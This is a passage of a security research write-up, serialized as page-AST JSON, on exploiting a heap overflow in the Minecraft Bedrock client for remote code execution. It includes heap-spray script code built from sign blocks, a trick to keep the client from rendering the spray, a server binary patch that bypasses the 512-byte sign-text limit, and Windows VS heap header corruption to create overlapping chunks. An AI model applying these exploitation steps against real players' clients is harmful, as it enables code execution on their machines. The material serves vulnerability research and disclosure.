BlockPermutation",{"type":28,"tag":116,"props":150739,"children":150740},{"style":266},[150741],{"type":33,"value":141},{"type":28,"tag":116,"props":150743,"children":150744},{"style":282},[150745],{"type":33,"value":150346},{"type":28,"tag":116,"props":150747,"children":150748},{"style":266},[150749],{"type":33,"value":313},{"type":28,"tag":116,"props":150751,"children":150752},{"style":563},[150753],{"type":33,"value":150754},"\"minecraft:wall_sign\"",{"type":28,"tag":116,"props":150756,"children":150757},{"style":266},[150758],{"type":33,"value":48503},{"type":28,"tag":116,"props":150760,"children":150761},{"class":245,"line":907},[150762,150767],{"type":28,"tag":116,"props":150763,"children":150764},{"style":272},[150765],{"type":33,"value":150766},"                    facing_direction:",{"type":28,"tag":116,"props":150768,"children":150769},{"style":350},[150770],{"type":33,"value":18990},{"type":28,"tag":116,"props":150772,"children":150773},{"class":245,"line":981},[150774],{"type":28,"tag":116,"props":150775,"children":150776},{"style":266},[150777],{"type":33,"value":70689},{"type":28,"tag":116,"props":150779,"children":150780},{"class":245,"line":1011},[150781],{"type":28,"tag":116,"props":150782,"children":150783},{"style":266},[150784],{"type":33,"value":150785},"            ));\n",{"type":28,"tag":116,"props":150787,"children":150788},{"class":245,"line":1029},[150789,150794,150799,150803],{"type":28,"tag":116,"props":150790,"children":150791},{"style":376},[150792],{"type":33,"value":150793},"            let",{"type":28,"tag":116,"props":150795,"children":150796},{"style":272},[150797],{"type":33,"value":150798}," sign_component",{"type":28,"tag":116,"props":150800,"children":150801},{"style":370},[150802],{"type":33,"value":2226},{"type":28,"tag":116,"props":150804,"children":150805},{"style":272},[150806],{"type":33,"value":150807}," sign_block\n",{"type":28,"tag":116,"props":150809,"children":150810},{"class":245,"line":1038},[150811,150815,150820,150824,150829,150833,150838],{"type":28,"tag":116,"props":150812,"children":150813},{"style":266},[150814],{"type":33,"value":150666},{"type":28,"tag":116,"props":150816,"children":150817},{"style":282},[150818],{"type":33,"value":150819},"getComponent",{"type":28,"tag":116,"props":150821,"children":150822},{"style":266},[150823],{"type":33,"value":313},{"type":28,"tag":116,"props":150825,"children":150826},{"style":272},[150827],{"type":33,"value":150828},"BlockComponentTypes",{"type":28,"tag":116,"props":150830,"children":150831},{"style":266},[150832],{"type":33,"value":141},{"type":28,"tag":116,"props":150834,"children":150835},{"style":272},[150836],{"type":33,"value":150837},"Sign",{"type":28,"tag":116,"props":150839,"children":150840},{"style":266},[150841],{"type":33,"value":895},{"type":28,"tag":116,"props":150843,"children":150844},{"class":245,"line":1047},[150845],{"type":28,"tag":116,"props":150846,"children":150847},{"emptyLinePlaceholder":19},[150848],{"type":33,"value":1044},{"type":28,"tag":116,"props":150850,"children":150851},{"class":245,"line":1071},[150852,150857,150861,150865],{"type":28,"tag":116,"props":150853,"children":150854},{"style":272},[150855],{"type":33,"value":150856},"            signs",{"type":28,"tag":116,"props":150858,"children":150859},{"style":266},[150860],{"type":33,"value":141},{"type":28,"tag":116,"props":150862,"children":150863},{"style":282},[150864],{"type":33,"value":3482},{"type":28,"tag":116,"props":150866,"children":150867},{"style":266},[150868],{"type":33,"value":14803},{"type":28,"tag":116,"props":150870,"children":150871},{"class":245,"line":1137},[150872,150877,150881],{"type":28,"tag":116,"props":150873,"children":150874},{"style":272},[150875],{"type":33,"value":150876},"                sign:",{"type":28,"tag":116,"props":150878,"children":150879},{"style":272},[150880],{"type":33,"value":150798},{"type":28,"tag":116,"props":150882,"children":150883},{"style":266},[150884],{"type":33,"value":3178},{"type":28,"tag":116,"props":150886,"children":150887},{"class":245,"line":1181},[150888,150893,150897],{"type":28,"tag":116,"props":150889,"children":150890},{"style":272},[150891],{"type":33,"value":150892},"                allocated:",{"type":28,"tag":116,"props":150894,"children":150895},{"style":376},[150896],{"type":33,"value":1022},{"type":28,"tag":116,"props":150898,"children":150899},{"style":266},[150900],{"type":33,"value":3178},{"type":28,"tag":116,"props":150902,"children":150903},{"class":245,"line":1212},[150904,150909,150913],{"type":28,"tag":116,"props":150905,"children":150906},{"style":272},[150907],{"type":33,"value":150908},"                block:",{"type":28,"tag":116,"props":150910,"children":150911},{"style":272},[150912],{"type":33,"value":150649},{"type":28,"tag":116,"props":150914,"children":150915},{"style":266},[150916],{"type":33,"value":3178},{"type":28,"tag":116,"props":150918,"children":150919},{"class":245,"line":1254},[150920,150925],{"type":28,"tag":116,"props":150921,"children":150922},{"style":272},[150923],{"type":33,"value":150924},"                removed:",{"type":28,"tag":116,"props":150926,"children":150927},{"style":376},[150928],{"type":33,"value":11979},{"type":28,"tag":116,"props":150930,"children":150931},{"class":245,"line":1262},[150932],{"type":28,"tag":116,"props":150933,"children":150934},{"style":266},[150935],{"type":33,"value":150936},"            });\n",{"type":28,"tag":116,"props":150938,"children":150939},{"class":245,"line":1294},[150940],{"type":28,"tag":116,"props":150941,"children":150942},{"style":266},[150943],{"type":33,"value":1954},{"type":28,"tag":116,"props":150945,"children":150946},{"class":245,"line":1334},[150947],{"type":28,"tag":116,"props":150948,"children":150949},{"style":266},[150950],{"type":33,"value":3025},{"type":28,"tag":116,"props":150952,"children":150953},{"class":245,"line":1372},[150954],{"type":28,"tag":116,"props":150955,"children":150956},{"style":266},[150957],{"type":33,"value":406},{"type":28,"tag":116,"props":150959,"children":150960},{"class":245,"line":1381},[150961],{"type":28,"tag":116,"props":150962,"children":150963},{"emptyLinePlaceholder":19},[150964],{"type":33,"value":1044},{"type":28,"tag":116,"props":150966,"children":150967},{"class":245,"line":1389},[150968,150972,150977],{"type":28,"tag":116,"props":150969,"children":150970},{"style":376},[150971],{"type":33,"value":830},{"type":28,"tag":116,"props":150973,"children":150974},{"style":282},[150975],{"type":33,"value":150976}," remove_wall",{"type":28,"tag":116,"props":150978,"children":150979},{"style":266},[150980],{"type":33,"value":1068},{"type":28,"tag":116,"props":150982,"children":150983},{"class":245,"line":1425},[150984,150988,150992],{"type":28,"tag":116,"props":150985,"children":150986},{"style":272},[150987],{"type":33,"value":150466},{"type":28,"tag":116,"props":150989,"children":150990},{"style":370},[150991],{"type":33,"value":2226},{"type":28,"tag":116,"props":150993,"children":150994},{"style":266},[150995],{"type":33,"value":150475},{"type":28,"tag":116,"props":150997,"children":150998},{"class":245,"line":1448},[150999],{"type":28,"tag":116,"props":151000,"children":151001},{"style":266},[151002],{"type":33,"value":61405},{"type":28,"tag":116,"props":151004,"children":151005},{"class":245,"line":1456},[151006,151010,151014,151018,151022,151026,151030,151034,151038,151042,151046,151050,151054,151058],{"type":28,"tag":116,"props":151007,"children":151008},{"style":260},[151009],{"type":33,"value":2703},{"type":28,"tag":116,"props":151011,"children":151012},{"style":266},[151013],{"type":33,"value":269},{"type":28,"tag":116,"props":151015,"children":151016},{"style":376},[151017],{"type":33,"value":11455},{"type":28,"tag":116,"props":151019,"children":151020},{"style":272},[151021],{"type":33,"value":150502},{"type":28,"tag":116,"props":151023,"children":151024},{"style":370},[151025],{"type":33,"value":2226},{"type":28,"tag":116,"props":151027,"children":151028},{"style":350},[151029],{"type":33,"value":2718},{"type":28,"tag":116,"props":151031,"children":151032},{"style":266},[151033],{"type":33,"value":16888},{"type":28,"tag":116,"props":151035,"children":151036},{"style":272},[151037],{"type":33,"value":150519},{"type":28,"tag":116,"props":151039,"children":151040},{"style":370},[151041],{"type":33,"value":8391},{"type":28,"tag":116,"props":151043,"children":151044},{"style":272},[151045],{"type":33,"value":150528},{"type":28,"tag":116,"props":151047,"children":151048},{"style":266},[151049],{"type":33,"value":16888},{"type":28,"tag":116,"props":151051,"children":151052},{"style":272},[151053],{"type":33,"value":150519},{"type":28,"tag":116,"props":151055,"children":151056},{"style":370},[151057],{"type":33,"value":50888},{"type":28,"tag":116,"props":151059,"children":151060},{"style":266},[151061],{"type":33,"value":844},{"type":28,"tag":116,"props":151063,"children":151064},{"class":245,"line":1520},[151065,151069,151073,151077,151081,151085,151089,151093,151097,151101,151105,151109,151113,151117],{"type":28,"tag":116,"props":151066,"children":151067},{"style":260},[151068],{"type":33,"value":60195},{"type":28,"tag":116,"props":151070,"children":151071},{"style":266},[151072],{"type":33,"value":269},{"type":28,"tag":116,"props":151074,"children":151075},{"style":376},[151076],{"type":33,"value":11455},{"type":28,"tag":116,"props":151078,"children":151079},{"style":272},[151080],{"type":33,"value":150564},{"type":28,"tag":116,"props":151082,"children":151083},{"style":370},[151084],{"type":33,"value":2226},{"type":28,"tag":116,"props":151086,"children":151087},{"style":350},[151088],{"type":33,"value":2718},{"type":28,"tag":116,"props":151090,"children":151091},{"style":266},[151092],{"type":33,"value":16888},{"type":28,"tag":116,"props":151094,"children":151095},{"style":272},[151096],{"type":33,"value":150581},{"type":28,"tag":116,"props":151098,"children":151099},{"style":370},[151100],{"type":33,"value":8391},{"type":28,"tag":116,"props":151102,"children":151103},{"style":272},[151104],{"type":33,"value":150590},{"type":28,"tag":116,"props":151106,"children":151107},{"style":266},[151108],{"type":33,"value":16888},{"type":28,"tag":116,"props":151110,"children":151111},{"style":272},[151112],{"type":33,"value":150581},{"type":28,"tag":116,"props":151114,"children":151115},{"style":370},[151116],{"type":33,"value":50888},{"type":28,"tag":116,"props":151118,"children":151119},{"style":266},[151120],{"type":33,"value":844},{"type":28,"tag":116,"props":151122,"children":151123},{"class":245,"line":1580},[151124],{"type":28,"tag":116,"props":151125,"children":151126},{"style":266},[151127],{"type":33,"value":150637},{"type":28,"tag":116,"props":151129,"children":151130},{"class":245,"line":1620},[151131,151135,151139],{"type":28,"tag":116,"props":151132,"children":151133},{"style":266},[151134],{"type":33,"value":150621},{"type":28,"tag":116,"props":151136,"children":151137},{"style":370},[151138],{"type":33,"value":9259},{"type":28,"tag":116,"props":151140,"children":151141},{"style":266},[151142],{"type":33,"value":11440},{"type":28,"tag":116,"props":151144,"children":151145},{"class":245,"line":1668},[151146],{"type":28,"tag":116,"props":151147,"children":151148},{"style":266},[151149],{"type":33,"value":151150},"             \n",{"type":28,"tag":116,"props":151152,"children":151153},{"class":245,"line":1677},[151154,151158,151162,151166,151170,151175],{"type":28,"tag":116,"props":151155,"children":151156},{"style":376},[151157],{"type":33,"value":1077},{"type":28,"tag":116,"props":151159,"children":151160},{"style":272},[151161],{"type":33,"value":150649},{"type":28,"tag":116,"props":151163,"children":151164},{"style":370},[151165],{"type":33,"value":2226},{"type":28,"tag":116,"props":151167,"children":151168},{"style":260},[151169],{"type":33,"value":35837},{"type":28,"tag":116,"props":151171,"children":151172},{"style":282},[151173],{"type":33,"value":151174}," wait_for_block",{"type":28,"tag":116,"props":151176,"children":151177},{"style":266},[151178],{"type":33,"value":3133},{"type":28,"tag":116,"props":151180,"children":151181},{"class":245,"line":1685},[151182,151187,151191,151195,151199,151203],{"type":28,"tag":116,"props":151183,"children":151184},{"style":272},[151185],{"type":33,"value":151186},"                world",{"type":28,"tag":116,"props":151188,"children":151189},{"style":266},[151190],{"type":33,"value":141},{"type":28,"tag":116,"props":151192,"children":151193},{"style":282},[151194],{"type":33,"value":150671},{"type":28,"tag":116,"props":151196,"children":151197},{"style":266},[151198],{"type":33,"value":313},{"type":28,"tag":116,"props":151200,"children":151201},{"style":563},[151202],{"type":33,"value":150680},{"type":28,"tag":116,"props":151204,"children":151205},{"style":266},[151206],{"type":33,"value":6408},{"type":28,"tag":116,"props":151208,"children":151209},{"class":245,"line":1729},[151210],{"type":28,"tag":116,"props":151211,"children":151212},{"style":272},[151213],{"type":33,"value":151214},"                sign_location\n",{"type":28,"tag":116,"props":151216,"children":151217},{"class":245,"line":1764},[151218],{"type":28,"tag":116,"props":151219,"children":151220},{"style":266},[151221],{"type":33,"value":124727},{"type":28,"tag":116,"props":151223,"children":151224},{"class":245,"line":1896},[151225,151229,151233,151237],{"type":28,"tag":116,"props":151226,"children":151227},{"style":272},[151228],{"type":33,"value":150717},{"type":28,"tag":116,"props":151230,"children":151231},{"style":266},[151232],{"type":33,"value":141},{"type":28,"tag":116,"props":151234,"children":151235},{"style":282},[151236],{"type":33,"value":150325},{"type":28,"tag":116,"props":151238,"children":151239},{"style":266},[151240],{"type":33,"value":3133},{"type":28,"tag":116,"props":151242,"children":151243},{"class":245,"line":1932},[151244,151248,151252,151256,151260,151264],{"type":28,"tag":116,"props":151245,"children":151246},{"style":272},[151247],{"type":33,"value":150737},{"type":28,"tag":116,"props":151249,"children":151250},{"style":266},[151251],{"type":33,"value":141},{"type":28,"tag":116,"props":151253,"children":151254},{"style":282},[151255],{"type":33,"value":150346},{"type":28,"tag":116,"props":151257,"children":151258},{"style":266},[151259],{"type":33,"value":313},{"type":28,"tag":116,"props":151261,"children":151262},{"style":563},[151263],{"type":33,"value":150355},{"type":28,"tag":116,"props":151265,"children":151266},{"style":266},[151267],{"type":33,"value":2830},{"type":28,"tag":116,"props":151269,"children":151270},{"class":245,"line":1940},[151271],{"type":28,"tag":116,"props":151272,"children":151273},{"style":266},[151274],{"type":33,"value":124727},{"type":28,"tag":116,"props":151276,"children":151277},{"class":245,"line":1948},[151278],{"type":28,"tag":116,"props":151279,"children":151280},{"emptyLinePlaceholder":19},[151281],{"type":33,"value":1044},{"type":28,"tag":116,"props":151283,"children":151284},{"class":245,"line":1957},[151285,151289,151293],{"type":28,"tag":116,"props":151286,"children":151287},{"style":266},[151288],{"type":33,"value":150621},{"type":28,"tag":116,"props":151290,"children":151291},{"style":370},[151292],{"type":33,"value":9259},{"type":28,"tag":116,"props":151294,"children":151295},{"style":266},[151296],{"type":33,"value":11440},{"type":28,"tag":116,"props":151298,"children":151299},{"class":245,"line":1970},[151300],{"type":28,"tag":116,"props":151301,"children":151302},{"style":266},[151303],{"type":33,"value":1954},{"type":28,"tag":116,"props":151305,"children":151306},{"class":245,"line":1987},[151307],{"type":28,"tag":116,"props":151308,"children":151309},{"style":266},[151310],{"type":33,"value":3025},{"type":28,"tag":116,"props":151312,"children":151313},{"class":245,"line":2003},[151314],{"type":28,"tag":116,"props":151315,"children":151316},{"style":266},[151317],{"type":33,"value":406},{"type":28,"tag":116,"props":151319,"children":151320},{"class":245,"line":31949},[151321],{"type":28,"tag":116,"props":151322,"children":151323},{"emptyLinePlaceholder":19},[151324],{"type":33,"value":1044},{"type":28,"tag":116,"props":151326,"children":151327},{"class":245,"line":80570},[151328,151333,151337,151342,151346,151351,151355,151360,151364,151369,151373,151377],{"type":28,"tag":116,"props":151329,"children":151330},{"style":272},[151331],{"type":33,"value":151332},"world",{"type":28,"tag":116,"props":151334,"children":151335},{"style":266},[151336],{"type":33,"value":141},{"type":28,"tag":116,"props":151338,"children":151339},{"style":272},[151340],{"type":33,"value":151341},"afterEvents",{"type":28,"tag":116,"props":151343,"children":151344},{"style":266},[151345],{"type":33,"value":141},{"type":28,"tag":116,"props":151347,"children":151348},{"style":272},[151349],{"type":33,"value":151350},"playerSpawn",{"type":28,"tag":116,"props":151352,"children":151353},{"style":266},[151354],{"type":33,"value":141},{"type":28,"tag":116,"props":151356,"children":151357},{"style":282},[151358],{"type":33,"value":151359},"subscribe",{"type":28,"tag":116,"props":151361,"children":151362},{"style":266},[151363],{"type":33,"value":1599},{"type":28,"tag":116,"props":151365,"children":151366},{"style":272},[151367],{"type":33,"value":151368},"arg",{"type":28,"tag":116,"props":151370,"children":151371},{"style":266},[151372],{"type":33,"value":1609},{"type":28,"tag":116,"props":151374,"children":151375},{"style":376},[151376],{"type":33,"value":1286},{"type":28,"tag":116,"props":151378,"children":151379},{"style":266},[151380],{"type":33,"value":1291},{"type":28,"tag":116,"props":151382,"children":151383},{"class":245,"line":80583},[151384,151389],{"type":28,"tag":116,"props":151385,"children":151386},{"style":282},[151387],{"type":33,"value":151388},"    create_wall",{"type":28,"tag":116,"props":151390,"children":151391},{"style":266},[151392],{"type":33,"value":1445},{"type":28,"tag":116,"props":151394,"children":151395},{"class":245,"line":80591},[151396],{"type":28,"tag":116,"props":151397,"children":151398},{"style":266},[151399],{"type":33,"value":34964},{"type":28,"tag":116,"props":151401,"children":151402},{"class":245,"line":80599},[151403],{"type":28,"tag":116,"props":151404,"children":151405},{"emptyLinePlaceholder":19},[151406],{"type":33,"value":1044},{"type":28,"tag":116,"props":151408,"children":151409},{"class":245,"line":80607},[151410,151414,151418,151423,151427,151432,151436,151440,151444,151448,151452,151456,151460,151464],{"type":28,"tag":116,"props":151411,"children":151412},{"style":272},[151413],{"type":33,"value":151332},{"type":28,"tag":116,"props":151415,"children":151416},{"style":266},[151417],{"type":33,"value":141},{"type":28,"tag":116,"props":151419,"children":151420},{"style":272},[151421],{"type":33,"value":151422},"beforeEvents",{"type":28,"tag":116,"props":151424,"children":151425},{"style":266},[151426],{"type":33,"value":141},{"type":28,"tag":116,"props":151428,"children":151429},{"style":272},[151430],{"type":33,"value":151431},"playerLeave",{"type":28,"tag":116,"props":151433,"children":151434},{"style":266},[151435],{"type":33,"value":141},{"type":28,"tag":116,"props":151437,"children":151438},{"style":282},[151439],{"type":33,"value":151359},{"type":28,"tag":116,"props":151441,"children":151442},{"style":266},[151443],{"type":33,"value":313},{"type":28,"tag":116,"props":151445,"children":151446},{"style":376},[151447],{"type":33,"value":35771},{"type":28,"tag":116,"props":151449,"children":151450},{"style":266},[151451],{"type":33,"value":269},{"type":28,"tag":116,"props":151453,"children":151454},{"style":272},[151455],{"type":33,"value":151368},{"type":28,"tag":116,"props":151457,"children":151458},{"style":266},[151459],{"type":33,"value":1609},{"type":28,"tag":116,"props":151461,"children":151462},{"style":376},[151463],{"type":33,"value":1286},{"type":28,"tag":116,"props":151465,"children":151466},{"style":266},[151467],{"type":33,"value":1291},{"type":28,"tag":116,"props":151469,"children":151470},{"class":245,"line":80647},[151471,151476],{"type":28,"tag":116,"props":151472,"children":151473},{"style":282},[151474],{"type":33,"value":151475},"    remove_wall",{"type":28,"tag":116,"props":151477,"children":151478},{"style":266},[151479],{"type":33,"value":1445},{"type":28,"tag":116,"props":151481,"children":151482},{"class":245,"line":80655},[151483],{"type":28,"tag":116,"props":151484,"children":151485},{"style":266},[151486],{"type":33,"value":34964},{"type":28,"tag":29,"props":151488,"children":151489},{},[151490],{"type":33,"value":151491},"This works well and produces a structure that the client ideally should not render - displaying and repeatedly updating this many signs during the spray would stall the client, which we want to avoid.",{"type":28,"tag":29,"props":151493,"children":151494},{},[151495],{"type":28,"tag":206,"props":151496,"children":151499},{"alt":151497,"src":151498},"image-min","/posts/minecraft-heap-overflow-to-rce/image3.png",[],{"type":28,"tag":29,"props":151501,"children":151502},{},[151503],{"type":33,"value":151504},"Preventing the client from rendering the sign wall is as simple as adjusting player’s view angle each tick, essentially forcing the client to look in the opposite direction of the sign wall.",{"type":28,"tag":443,"props":151506,"children":151508},{"id":151507},"a-small-roadblock",[151509],{"type":33,"value":151510},"A Small Roadblock",{"type":28,"tag":29,"props":151512,"children":151513},{},[151514],{"type":33,"value":151515},"While testing our heap spray method, we encountered the following error:",{"type":28,"tag":234,"props":151517,"children":151519},{"code":151518},"[Scripting] Error: Provided message is too long.\nMax length is 512 and the provided message has length of 1024.\n    at alloc (index.js:169)\n",[151520],{"type":28,"tag":98,"props":151521,"children":151522},{"__ignoreMap":7},[151523],{"type":33,"value":151518},{"type":28,"tag":29,"props":151525,"children":151526},{},[151527,151529,151535],{"type":33,"value":151528},"An error is thrown by the server executable while trying to assign text longer than ",{"type":28,"tag":98,"props":151530,"children":151532},{"className":151531},[],[151533],{"type":33,"value":151534},"512",{"type":33,"value":151536}," bytes to a sign. This severely limits our approach, as it prevents us from spraying the VS heap with large chunks needed for the mentioned chunk-overlap technique.",{"type":28,"tag":29,"props":151538,"children":151539},{},[151540],{"type":33,"value":151541},"Before abandoning the idea entirely, we considered one possibility: perhaps this check only occurs server-side, and the client might not validate the length of the data it receives.",{"type":28,"tag":29,"props":151543,"children":151544},{},[151545],{"type":33,"value":151546},"We searched for the error message in the Bedrock server executable and located the length-validation logic:",{"type":28,"tag":29,"props":151548,"children":151549},{},[151550],{"type":28,"tag":206,"props":151551,"children":151553},{"alt":50198,"src":151552},"/posts/minecraft-heap-overflow-to-rce/image4.png",[],{"type":28,"tag":29,"props":151555,"children":151556},{},[151557,151559,151565],{"type":33,"value":151558},"Although the involved functions are unnamed, it’s clear that we always want execution to take the ",{"type":28,"tag":98,"props":151560,"children":151562},{"className":151561},[],[151563],{"type":33,"value":151564},"string_length \u003C= 512",{"type":33,"value":151566}," branch, regardless of the actual length. Otherwise, the error is thrown and the client never allocates the desired chunk.",{"type":28,"tag":29,"props":151568,"children":151569},{},[151570],{"type":33,"value":151571},"The disassembly of the comparison looks like this:",{"type":28,"tag":29,"props":151573,"children":151574},{},[151575],{"type":28,"tag":206,"props":151576,"children":151578},{"alt":50198,"src":151577},"/posts/minecraft-heap-overflow-to-rce/image5.png",[],{"type":28,"tag":29,"props":151580,"children":151581},{},[151582,151584,151589,151591,151596,151597,151602,151604,151610,151612,151618,151620,151625,151627,151632],{"type":33,"value":151583},"The code compares ",{"type":28,"tag":98,"props":151585,"children":151587},{"className":151586},[],[151588],{"type":33,"value":56393},{"type":33,"value":151590}," (the string length) to ",{"type":28,"tag":98,"props":151592,"children":151594},{"className":151593},[],[151595],{"type":33,"value":127427},{"type":33,"value":269},{"type":28,"tag":98,"props":151598,"children":151600},{"className":151599},[],[151601],{"type":33,"value":151534},{"type":33,"value":151603}," decimal). It then performs a ",{"type":28,"tag":98,"props":151605,"children":151607},{"className":151606},[],[151608],{"type":33,"value":151609},"jbe",{"type":33,"value":151611},", jumping to address ",{"type":28,"tag":98,"props":151613,"children":151615},{"className":151614},[],[151616],{"type":33,"value":151617},"0x14275114c",{"type":33,"value":151619}," if ",{"type":28,"tag":98,"props":151621,"children":151623},{"className":151622},[],[151624],{"type":33,"value":56393},{"type":33,"value":151626}," is less than or equal to ",{"type":28,"tag":98,"props":151628,"children":151630},{"className":151629},[],[151631],{"type":33,"value":151534},{"type":33,"value":151633},". That target location contains the logic that instructs the client to update the sign text - the branch we want to reach every time.",{"type":28,"tag":29,"props":151635,"children":151636},{},[151637,151639,151644,151646,151652],{"type":33,"value":151638},"To force execution down this path, we patched the ",{"type":28,"tag":98,"props":151640,"children":151642},{"className":151641},[],[151643],{"type":33,"value":151609},{"type":33,"value":151645}," instruction to an unconditional ",{"type":28,"tag":98,"props":151647,"children":151649},{"className":151648},[],[151650],{"type":33,"value":151651},"jmp",{"type":33,"value":151653},", ensuring the correct branch is always taken, regardless of the comparison result.",{"type":28,"tag":29,"props":151655,"children":151656},{},[151657],{"type":28,"tag":206,"props":151658,"children":151660},{"alt":50198,"src":151659},"/posts/minecraft-heap-overflow-to-rce/image6.png",[],{"type":28,"tag":29,"props":151662,"children":151663},{},[151664,151666,151671,151673,151678],{"type":33,"value":151665},"After patching the server and calling ",{"type":28,"tag":98,"props":151667,"children":151669},{"className":151668},[],[151670],{"type":33,"value":149776},{"type":33,"value":151672}," with a size of ",{"type":28,"tag":98,"props":151674,"children":151676},{"className":151675},[],[151677],{"type":33,"value":57766},{"type":33,"value":151679},", the operation now executes successfully, and the client happily allocates a chunk of that size:",{"type":28,"tag":29,"props":151681,"children":151682},{},[151683],{"type":28,"tag":206,"props":151684,"children":151686},{"alt":50198,"src":151685},"/posts/minecraft-heap-overflow-to-rce/image7.png",[],{"type":28,"tag":18457,"props":151688,"children":151689},{},[],{"type":28,"tag":29,"props":151691,"children":151692},{},[151693],{"type":33,"value":151694},"Having a way to spray the heap is great - we can now use the previously mentioned technique to create overlapping chunks in the VS heap, or use it to shape the LFH so that the 4-byte overflow can overwrite an internal Minecraft structure.",{"type":28,"tag":29,"props":151696,"children":151697},{},[151698],{"type":33,"value":151699},"At the time, we couldn't find any useful Minecraft structures to abuse with just a 4-byte OOB write, so we worked on getting overlapping chunks instead.",{"type":28,"tag":75,"props":151701,"children":151703},{"id":151702},"overlapping-heap-chunks",[151704],{"type":33,"value":151705},"Overlapping Heap Chunks",{"type":28,"tag":29,"props":151707,"children":151708},{},[151709,151711,151716],{"type":33,"value":151710},"The attack is described in detail in the referenced blog post (",{"type":28,"tag":87,"props":151712,"children":151714},{"href":149520,"rel":151713},[91],[151715],{"type":33,"value":2039},{"type":33,"value":151717},"), so we will present a high-level overview.",{"type":28,"tag":29,"props":151719,"children":151720},{},[151721,151723,151729],{"type":33,"value":151722},"The core idea is to insert a large chunk that overlaps other chunks above it into the free list. To understand this, some basic knowledge of ",{"type":28,"tag":98,"props":151724,"children":151726},{"className":151725},[],[151727],{"type":33,"value":151728},"_HEAP_VS_CHUNK_HEADER",{"type":33,"value":151730}," structure layout is required:",{"type":28,"tag":234,"props":151732,"children":151734},{"code":151733},"     +---------------------------+           +---------------+\n+0x0 |_HEAP_VS_CHUNK_HEADER_SIZE +----> +0x0 |MemoryCost     |\n     +---------------------------+           +---------------+\n+0x8 |EncodedSegmentPageOffset   |      +0x2 |UnsafeSize     |\n     +---------------------------+           +---------------+\n+0x8 |UnusedBytes                |      +0x4 |UnsafePrevSize |\n     +---------------------------+           +---------------+\n     |           . . .           |      +0x6 |Allocated      |\n                                             +---------------+\n                                             |     . . .     |\n",[151735],{"type":28,"tag":98,"props":151736,"children":151737},{"__ignoreMap":7},[151738],{"type":33,"value":151733},{"type":28,"tag":29,"props":151740,"children":151741},{},[151742,151744,151750,151752,151758,151759,151765,151766,151772,151774,151779,151781,151786,151788,151794,151796,151801,151803,151809],{"type":33,"value":151743},"At offset 0 there is a header ",{"type":28,"tag":98,"props":151745,"children":151747},{"className":151746},[],[151748],{"type":33,"value":151749},"_HEAP_VS_CHUNK_HEADER_SIZE",{"type":33,"value":151751}," containing fields such as ",{"type":28,"tag":98,"props":151753,"children":151755},{"className":151754},[],[151756],{"type":33,"value":151757},"MemoryCost",{"type":33,"value":825},{"type":28,"tag":98,"props":151760,"children":151762},{"className":151761},[],[151763],{"type":33,"value":151764},"UnsafeSize",{"type":33,"value":825},{"type":28,"tag":98,"props":151767,"children":151769},{"className":151768},[],[151770],{"type":33,"value":151771},"UnsafePrevSize",{"type":33,"value":151773},", etc. For the attack we only care about the ",{"type":28,"tag":98,"props":151775,"children":151777},{"className":151776},[],[151778],{"type":33,"value":151764},{"type":33,"value":151780}," field: it holds the size of the chunk as its value. Specifically the value is size divided by ",{"type":28,"tag":98,"props":151782,"children":151784},{"className":151783},[],[151785],{"type":33,"value":126050},{"type":33,"value":151787},", so for a chunk of size ",{"type":28,"tag":98,"props":151789,"children":151791},{"className":151790},[],[151792],{"type":33,"value":151793},"0x4010",{"type":33,"value":151795}," the value of ",{"type":28,"tag":98,"props":151797,"children":151799},{"className":151798},[],[151800],{"type":33,"value":151764},{"type":33,"value":151802}," would be ",{"type":28,"tag":98,"props":151804,"children":151806},{"className":151805},[],[151807],{"type":33,"value":151808},"0x401",{"type":33,"value":141},{"type":28,"tag":29,"props":151811,"children":151812},{},[151813,151814,151819],{"type":33,"value":63836},{"type":28,"tag":98,"props":151815,"children":151817},{"className":151816},[],[151818],{"type":33,"value":151764},{"type":33,"value":151820}," field is a 2-byte field located at offset 0x2 relative to the header. Because of that, it can be fully overwritten by the final two bytes of the 4-byte OOB write.",{"type":28,"tag":29,"props":151822,"children":151823},{},[151824,151826,151831,151833,151838,151840,151846,151848,151853],{"type":33,"value":151825},"The field is encoded with a random key that we do not know, so the exact bytes which we overwrite it with don't matter and the size after will be random. That said, by overwriting ",{"type":28,"tag":98,"props":151827,"children":151829},{"className":151828},[],[151830],{"type":33,"value":151764},{"type":33,"value":151832}," in the smallest possible VS chunk (",{"type":28,"tag":98,"props":151834,"children":151836},{"className":151835},[],[151837],{"type":33,"value":151793},{"type":33,"value":151839},"), we maximize the probability that the decoded size becomes larger than the original. Since the decoded size will be anywhere in ",{"type":28,"tag":98,"props":151841,"children":151843},{"className":151842},[],[151844],{"type":33,"value":151845},"[0x10, 0xffff0]",{"type":33,"value":151847}," range, the probability that it exceeds ",{"type":28,"tag":98,"props":151849,"children":151851},{"className":151850},[],[151852],{"type":33,"value":151793},{"type":33,"value":151854}," is:",{"type":28,"tag":234,"props":151856,"children":151858},{"code":151857},"1 - ((0x4010 - 0x10) / (0xffff0 - 0x10)) ~= 98.4%\n",[151859],{"type":28,"tag":98,"props":151860,"children":151861},{"__ignoreMap":7},[151862],{"type":33,"value":151857},{"type":28,"tag":29,"props":151864,"children":151865},{},[151866],{"type":33,"value":151867},"Thus, there is roughly a 98% chance that the resulting decoded size will be larger than the original chunk size.",{"type":28,"tag":29,"props":151869,"children":151870},{},[151871],{"type":33,"value":151872},"Considering there are slight differences between the kernel and userland heap, and that maximizing the success rate of the attack doesn't matter as much for purposes of this writeup, we will do a simplified attack to the one in the referenced blogpost.",{"type":28,"tag":443,"props":151874,"children":151876},{"id":151875},"overlap-attack-overview",[151877],{"type":33,"value":151878},"Overlap Attack Overview",{"type":28,"tag":29,"props":151880,"children":151881},{},[151882,151884,151889],{"type":33,"value":151883},"The goal of the attack is to overwrite the first four bytes of the VS chunk header that we control - in this case the allocation that holds sign text. We then call ",{"type":28,"tag":98,"props":151885,"children":151887},{"className":151886},[],[151888],{"type":33,"value":126073},{"type":33,"value":151890}," on the overwritten chunk so it is inserted into the free list as an overly large chunk, which we can use to create overlaps.",{"type":28,"tag":29,"props":151892,"children":151893},{},[151894,151896,151901,151903,151908],{"type":33,"value":151895},"We don't know the remote client's exact heap layout, but it likely contains ",{"type":28,"tag":98,"props":151897,"children":151899},{"className":151898},[],[151900],{"type":33,"value":147779},{"type":33,"value":151902},"-sized chunks in the free list that we want to avoid. If a ",{"type":28,"tag":98,"props":151904,"children":151906},{"className":151905},[],[151907],{"type":33,"value":147779},{"type":33,"value":151909},"-sized free chunk is used, the 4-byte OOB write could clobber some unknown chunk above it that we don’t control.",{"type":28,"tag":29,"props":151911,"children":151912},{},[151913,151915,151920],{"type":33,"value":151914},"To remove those 